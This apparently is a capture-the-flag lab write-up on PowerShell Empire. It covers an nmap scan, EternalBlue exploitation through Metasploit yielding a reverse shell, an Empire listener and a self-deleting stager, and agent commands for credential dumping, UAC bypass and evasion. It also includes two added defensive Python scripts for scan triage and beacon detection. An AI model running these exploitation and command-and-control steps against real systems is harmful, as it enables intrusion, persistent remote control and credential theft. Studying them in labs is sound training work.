Welcome! This writeup goes over how to use PS Empire to set up a listener and get the stager for the listener onto the target Windows server.
Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.
1) Deploy this machine and learn what exploitation this box is susceptible to!
Let’s scan the machine with nmap, adding the vuln script category so it checks the open services against known vulnerabilities. The smb-vuln-ms17-010 script shows the Windows server is susceptible to MS17-010.
$ nmap [machine_ip] -A -T4 --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 20:51 PDT
Pre-scan script results:
|_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug)
Nmap scan report for [machine_ip]
Host is up (0.41s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp  open  ssl/ms-wbt-server?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_sslv2-drown:
49152/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49160/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.55 seconds
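On the defensive side, the same scan output is the starting point for a patch list. The following Python script is an added example (not part of the original writeup): it parses the tree-style output of nmap's vuln scripts into structured findings keyed by CVE. The excerpt it parses is constructed here in the same layout as the scan above, not a fresh scan.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in the layout of the --script vuln tree above (not a real scan).
SAMPLE_SCAN = """\
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

SCRIPT_RE = re.compile(r"^\|_?\s?([\w-]+):(?!//)\s*(.*)$")  # "| script:" or "|_script: result", never a URL
TITLE_RE = re.compile(r"^\|   (\S.*)$")                      # exactly three spaces: a finding title
FIELD_RE = re.compile(r"^\|\s+(State|IDs|Risk factor):\s*(.*)$")

@dataclass
class Finding:
    script: str
    title: str
    state: str = ""
    risk: str = ""
    cves: list = field(default_factory=list)

def parse_vuln_output(text):
    """Return one Finding per entry whose State is VULNERABLE."""
    findings, script, current = [], None, None
    for line in text.splitlines():
        if m := SCRIPT_RE.match(line):
            script, current = m.group(1), None        # new script block; "name: false" carries no findings
        elif (m := TITLE_RE.match(line)) and m.group(1) != "VULNERABLE:":
            current = Finding(script=script, title=m.group(1))
            findings.append(current)
        elif (m := FIELD_RE.match(line)) and current is not None:
            key, value = m.group(1), m.group(2).strip()
            if key == "State":
                current.state = value
            elif key == "IDs":
                current.cves = re.findall(r"CVE-\d{4}-\d+", value)
            else:                                      # "High  CVSSv2: 9.3 ..." -> "HIGH"
                current.risk = value.split()[0].upper()
    return [f for f in findings if f.state == "VULNERABLE"]

def triage(text):
    """Map each CVE to (script, risk) so the findings can be prioritised for patching."""
    return {cve: (f.script, f.risk) for f in parse_vuln_output(text) for cve in f.cves}
```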
2) Exploit the vulnerability to spawn a reverse shell!
We can start metasploit-framework and search for exploits related to MS17-010. Once the correct exploit is found and the options are set (RHOSTS, LHOST, etc.), the exploit can be run.
$ msfconsole
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts [machine_ip]
rhosts => [machine_ip]
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on [host_ip]:4444
[*] [machine_ip]:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] [machine_ip]:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] [machine_ip]:445 - Scanned 1 of 1 hosts (100% complete)
[*] [machine_ip]:445 - Connecting to target for exploitation.
[+] [machine_ip]:445 - Connection established for exploitation.
[+] [machine_ip]:445 - Target OS selected valid for OS indicated by SMB reply
[*] [machine_ip]:445 - CORE raw buffer dump (42 bytes)
[*] [machine_ip]:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] [machine_ip]:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] [machine_ip]:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] [machine_ip]:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] [machine_ip]:445 - Trying exploit with 12 Groom Allocations.
[*] [machine_ip]:445 - Sending all but last fragment of exploit packet
[*] [machine_ip]:445 - Starting non-paged pool grooming
[+] [machine_ip]:445 - Sending SMBv2 buffers
[+] [machine_ip]:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] [machine_ip]:445 - Sending final SMBv2 buffers.
[*] [machine_ip]:445 - Sending last fragment of exploit packet!
[*] [machine_ip]:445 - Receiving response from exploit packet
[+] [machine_ip]:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] [machine_ip]:445 - Sending egg to corrupted connection.
[*] [machine_ip]:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened ([host_ip]:4444 -> [machine_ip]:49187) at 2020-05-13 10:23:31 -0700
[+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
We now have a reverse shell into the Windows Server.
This task involves installing PowerShell Empire onto the host Linux machine.
Just follow the directions in the post, which are the same as the instructions on Empire’s own website.
I had no issues installing, but some users report not being able to get the database running, and Empire needs the database in order to start. I did have some errors while installing; what I did was run the /setup/reset.sh script, and now my install works with no issues.
1) Once Empire has launched, type help to view the various menus. Which menu do we launch to access listeners?
2) Launch the listeners menu. In a manner similar to Cobalt Strike/Metasploit, this will launch a contextual submenu. For the sake of this tutorial, we will be using an http listener in order to catch our connections. Type the command ‘uselistener http’ now. You can double-tap tab after typing ‘uselistener’ to view all the available listener types.
Answer: No answer needed.
3) What command can we now type to view all of the options related to our selected listener type?
4) Once the information regarding the listener pops up, peruse this for some of the more interesting options we can set in order to disguise our actions more. Which option can we use to set specific times when our listener will be active?
5) Similar to changing/spoofing what browser you are using on the internet, what option can we set to appear as a different user agent (i.e. chrome, firefox, etc)?
6) What option can we use to set the port which the listener will bind to?
7) In addition to changing our browser profile, we can change what our server appears as. What option can we set to change this?
**Empire has changed its menu options since the creation of the room, and I have verified with TryHackMe mods that the room needs to be updated.
**The relevant option in this menu that does what the question asks (but is not accepted as the correct answer) is Headers. A user on the THM Discord server messaged me and revealed the accepted answer.
Answer: It accepts ServerVersion as correct answer.
8) Launch our newly created listener on port 80 with the command ‘execute’. What message is displayed following successfully launching the listener?
Answer: Listener successfully started!
9) We can verify that our listener is now active by typing what command?
1) First, type the command ‘usestager’ and double-tap tab to view all options we have for stagers. Which option allows us to use a batch file?
(Empire: listeners) > usestager
multi/bash                osx/jar                   windows/bunny             windows/launcher_xml
multi/launcher            osx/launcher              windows/csharp_exe        windows/macro
multi/macro               osx/macho                 windows/dll               windows/macroless_msword
multi/pyinstaller         osx/macro                 windows/ducky             windows/shellcode
multi/war                 osx/pkg                   windows/hta               windows/teensy
osx/applescript           osx/safari_launcher       windows/launcher_bat      windows/wmic
osx/application           osx/shellcode             windows/launcher_lnk
osx/ducky                 osx/teensy                windows/launcher_sct
osx/dylib                 windows/backdoorLnkMacro  windows/launcher_vbs
2) Let’s finish our previous command and select the batch file option. Press enter to finalize this. What is our new path to the ‘module’ we have selected?
3) Since we’ve previously set our listener to use http, we must now set the associated options within our stager we are building to match that. What option must we set in order to accomplish this?
(Empire: stager/windows/launcher_bat) > info

Name: BAT Launcher

Description:
  Generates a self-deleting .bat launcher for Empire.

Options:

  Name              Required    Value              Description
  ----              --------    -------            -----------
  Listener          True                           Listener to generate stager for.
  Language          True        powershell         Language of the stager to generate.
  StagerRetries     False       0                  Times for the stager to retry connecting.
  OutFile           False       /tmp/launcher.bat  File to output .bat launcher to, otherwise displayed on the screen.
  Delete            False       True               Switch. Delete .bat after running.
  Obfuscate         False       False              Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
  ObfuscateCommand  False       Token\All\1        The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
  UserAgent         False       default            User-agent string to use for the staging request (default, none, or other).
  Proxy             False       default            Proxy to use for request (default, none, or other).
  ProxyCreds        False       default            Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
4) Type execute to finish creating our stager. Where is the stager saved?
(Empire: stager/windows/launcher_bat) > set Listener http1
(Empire: stager/windows/launcher_bat) > execute
[*] Stager output written out to: /tmp/launcher.bat
5) Using any shell you have previously gained into our victim system, transport the stager batch file to the system and execute it. This can be done in numerous ways depending on the stager used; be prepared to be flexible with your transportation methods, similarly to how you might handle an msfvenom payload.
Here, I tried a couple of different methods. First I tried to run a Python HTTP server on the directory where the launcher.bat file is located, then use several different Windows commands to download the file. None of these worked; the command/service would just freeze, or would not actually save the file after it was downloaded.
The method that worked for me was to upgrade the reverse shell into a Meterpreter shell and use the upload command.
Go back to the msfconsole window and background the reverse shell we have with Ctrl + Z. Then search for the post-exploitation module “multi/manage/shell_to_meterpreter”. Set the SESSION option to the backgrounded reverse shell and run the module. This should create a new session with a Meterpreter shell.
More detailed instructions for upgrading to a Meterpreter shell are available here: https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/
Once we have a meterpreter shell, we can use the upload command to transfer the launcher.bat file onto the Windows Server.
Note that the upload command has the syntax:
upload <source> <dest>
In this example, I first navigated to the top of the C:\ drive in meterpreter. So when I use the upload command, it will place ‘launcher.bat’ into C:\.
meterpreter > upload /tmp/launcher.bat launcher.bat
[*] uploading  : /tmp/launcher.bat -> launcher.bat
[*] Uploaded 5.00 KiB of 5.00 KiB (100.0%): /tmp/launcher.bat -> launcher.bat
[*] uploaded   : /tmp/launcher.bat -> launcher.bat
Now we can go back to the regular shell and run launcher.bat.
1) First, type agents to view our registered agents.
Answer: No answer needed.
2) Once you’ve typed agents to list the registered agents, the agents submenu will become active. Use the help menu to answer the following questions.
Answer: No answer needed.
(Empire: agents) > help

Commands
========

agents            Jump to the agents menu.
autorun           Read and execute a list of Empire commands from a file and execute on each new agent "autorun <resource file> <agent language>" e.g. "autorun /root/ps.rc powershell". Or clear any autorun setting with "autorun clear" and show current autorun settings with "autorun show"
back              Go back to the main menu.
clear             Clear one or more agent's taskings.
creds             Display/return credentials from the database.
exit              Exit Empire.
help              Displays the help menu.
interact          Interact with a particular agent.
kill              Task one or more agents to exit.
killdate          Set the killdate for one or more agents (killdate [agent/all] 01/01/2016).
list              Lists all active agents (or listeners).
listeners         Jump to the listeners menu.
lostlimit         Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '
main              Go back to the main menu.
remove            Remove one or more agents from the database.
rename            Rename a particular agent.
resource          Read and execute a list of Empire commands from a file.
searchmodule      Search Empire module names/descriptions.
sleep             Task one or more agents to 'sleep [agent/all] interval [jitter]'
uselistener       Use an Empire listener module.
usemodule         Use an Empire PowerShell module.
usestager         Use an Empire stager.
workinghours      Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00).
3) What command do we use to interact with an agent?
4) What about if we wanted to list any usernames and passwords we have gathered?
5) And if we wanted to ‘deactivate’ an agent for a while to avoid detection?
6) How about if we wanted to delete an agent or disconnect it?
7) Moving into the post exploitation modules, what command can we use to search through these?
8) We’ll start with the most important module, find the module which plays a specific AC/DC song.
(Empire: agents) > searchmodule thunderstruck
 powershell/trollsploit/thunderstruck      Play's a hidden version of AC/DC's Thunderstruck video while maxing out a computer's volume.
 python/trollsploit/osx/thunderstruck      Open Safari in the background and play Thunderstruck.
9) What if we wanted to perform an lsa dump with a certain popular windows credential gathering tool?
10) Sometimes we might not have the permission level that we require to perform further actions; what module set might we have to use to get around UAC?
11) What module family allows us to gather additional information about the network we are on?
12) The process we have compromised might not be the most stable; how do we migrate to another process? (This will have a specific module answer)
13) Last but not least, what module can we use to turn on remote desktop access for our purposes?
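The agent commands above (a sleep interval with jitter, working hours, a spoofable user agent) all shape how an agent checks in over the http listener, and that shape is what a defender looks for in proxy logs. The following Python script is an added example, not part of the original writeup: it groups requests by client, destination and user agent and flags series whose inter-request gaps are nearly constant. The log format, addresses and user-agent strings are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

LOG_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\S+)$')   # time client "user-agent" host

def make_lines(client, host, ua, offsets):
    """Build constructed log lines from second offsets (sample data for this example)."""
    base = datetime(2020, 5, 13, 10, 30, 0)
    return [f'{(base + timedelta(seconds=o)).isoformat()} {client} "{ua}" {host}' for o in offsets]

# Constructed data: one host checking in every ~5 s with about 20% jitter, one host browsing.
BEACON_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
SAMPLE_LOG = (
    make_lines("10.0.0.5", "203.0.113.7", BEACON_UA, [0, 5, 11, 15, 20, 26, 30, 35, 41, 45])
    + make_lines("10.0.0.9", "example.com", "Mozilla/5.0 Firefox/76.0", [0, 3, 40, 41, 42, 120, 300, 301, 600, 900])
)

def parse_log(lines):
    """Yield (timestamp, client, user_agent, host) for each well-formed line."""
    for line in lines:
        if m := LOG_RE.match(line):
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)

def find_beacons(lines, min_hits=8, max_cv=0.3):
    """Return {(client, host, user_agent): (mean_gap_seconds, cv)} for regular check-ins.

    cv is the coefficient of variation of the gaps between requests. A fixed sleep
    with modest jitter gives a small cv; interactive browsing is bursty and does not."""
    series = defaultdict(list)
    for ts, client, ua, host in parse_log(lines):
        series[(client, host, ua)].append(ts)
    hits = {}
    for key, stamps in series.items():
        if len(stamps) < min_hits:           # too few requests to judge regularity
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else 0.0
        if cv <= max_cv:
            hits[key] = (avg, round(cv, 3))
    return hits
```

Raising the jitter or using workinghours stretches the gaps, so in practice this check is run per working window and combined with user-agent and destination reputation rather than used alone.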
We’re done! We can really mess up a Windows System with this framework. I really enjoy the trollsploits – playing AC/DC, and there’s one that plays Rick Astley’s Never Gonna Give You Up!